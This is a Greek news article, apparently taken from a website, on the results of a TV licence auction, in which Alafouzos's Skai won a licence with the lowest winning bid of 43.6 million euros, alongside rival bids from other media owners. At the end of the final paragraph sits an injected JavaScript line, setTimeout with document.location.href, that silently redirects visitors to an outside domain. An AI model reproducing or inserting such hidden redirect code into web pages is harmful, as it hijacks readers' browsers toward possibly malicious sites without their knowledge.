Ο Αλαφούζος είχε…Κιμπουρόπουλο στη μηχανή του!

0
16

Μεγάλος κερδισμένος του διαγωνισμού είναι ο Γιάννης Αλαφούζος, όχι μόνο επειδή κατάφερε να κερδίσει για τον Σκάι μία από τις τέσσερις τηλεοπτικές άδειες, αλλά και διότι έδωσε τα λιγότερα χρήματα από όλους (43,6 εκατ ευρώ).

Είναι σαφές ότι ο γενικός διευθυντής του σταθμού Κώστας Κιμπουρόπουλος είχε εντελώς διαφορετική στρατηγική από τους περισσότερους διεκδικητές.

Image result for αλαφούζος κιμπουρόπουλος

Στόχευσε στην πρώτη άδεια, εκτιμώντας ότι οι επόμενοι γύροι θα κινηθούν σε πολύ υψηλότερα ποσά. Αντίθετα, η πλειοψηφία των αντιπάλων του ήταν «μαζεμένοι», πιστεύοντας ότι θα μπορέσουν να πάρουν άδεια με λιγότερα χρήματα στους επόμενους γύρους -πράγμα που ποδείχθηκε μεγάλο λάθος.

Ο μόνος που τον απείλησε ήταν ο Βλαδίμηρος Καλογρίτσας, ο οποίος προσέφερε 40 εκατ ευρώ και έδειξε αποφασισμένος να κερδίσει μια άδεια.

Την τρίτη καλύτερη προσφορά έκανε ο εκπρόσωπος του Δημήτρη Κοντομηνά για τον Alpha, ο κ. Φουρλεμάδης (30 εκατ ευρώ).

Χαμηλά, σε σχέση με τους τρεις πρώτους, έμειναν οι πρόεδροι του Ολυμπιακού Βαγγέλης Μαρινάκης και Ιβάν Σαββίδης (20,5 και 20 εκατ αντιστοίχως), ενώ πολύ πιο κάτω κινήθηκε ο Θοδωρής Κυριακού για τον Αντέννα (13,5 εκατ ευρώ) και οι δυο εκπρόσωποι της οικογένειας Βαρδινογιάννη (13,5 και 8 εκατ αντιστοίχως). setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here